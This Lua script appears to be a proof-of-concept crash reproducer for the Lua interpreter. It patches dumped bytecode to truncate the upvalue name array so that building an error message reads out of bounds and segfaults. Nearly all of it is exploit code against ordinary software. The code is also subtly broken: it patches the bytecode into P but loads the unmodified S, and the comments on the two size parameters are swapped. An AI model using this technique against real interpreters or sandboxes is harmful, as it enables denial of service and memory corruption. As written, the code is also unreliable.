  1. -- Configure these parameters for your environment
  2. sizeof_int = 4    -- sizeof(size_t) in C
  3. sizeof_size_t = 4 -- sizeof(int) in C
  4. endian = "small"  -- "small" or "big"
  5.  
  6. -- do ... end block so that the locals are used if this is typed line by line into the interpreter
  7. do
  8.   -- define some locals to be used as upvalues
  9.   local a, b, c
  10.   -- define a function using upvalues
  11.   function F()
  12.     -- Make sure that upvalues #1 through #2 refer to a, b and c (in that order)
  13.     local _ = {a, b, c}
  14.     -- This line will generate an error referring to upvalue #3
  15.     return c[b][a]
  16.   end
  17. end
  18.  
  19. -- Convert function F to it's binary form
  20. -- (the values of the upvalues are not dumped)
  21. S = string.dump(F)
  22.  
  23. -- Remove the upvalue names of upvalues #2 and #3 from the debug information
  24. if endian == "small" then
  25.   -- We need at-least one upvalue name, or else the upvalue name array will be of zero length
  26.   -- and thus be NULL (lua allocator must return NULL when nsize == 0). Thus reduce the upvalue
  27.   -- name array to a single entry.
  28.   P = S:gsub("\3".. ("%z"):rep(sizeof_int - 1) ..           -- Number of upvalue names (3)
  29.              "\2".. ("%z"):rep(sizeof_size_t - 1) ..".%z".. -- Name of upvalue #1 (length 2, "a\0")
  30.              "\2".. ("%z"):rep(sizeof_size_t - 1) ..".%z"   -- Name of upvalue #2 (length 2, "b\0")
  31.              ,
  32.              "\1".. ("\0"):rep(sizeof_int - 1)              -- Number of upvalue names (1)
  33.             )
  34. else
  35.   -- Same as previous code, but for big-endian integers
  36.   P = S:gsub(("%z"):rep(sizeof_int - 1) .."\3"..
  37.              ("%z"):rep(sizeof_size_t - 1) .."\2.%z"..
  38.              ("%z"):rep(sizeof_size_t - 1) .."\2.%z"
  39.              ,
  40.              ("\0"):rep(sizeof_int - 1) .. "\1"
  41.             )
  42. end
  43.  
  44. -- Load the modified binary
  45. M = assert(loadstring(S))
  46.  
  47. -- Execute the modified function
  48. -- This should cause the error "attempt to index upvalue 'c' (a nil value)"
  49. -- However, as the name of upvalue #3 is no longer in the upvalue name array, when the VM goes to generate
  50. -- the error message, it references past the end of the upvalue name array, leading to a segfault
  51. M()
  52.  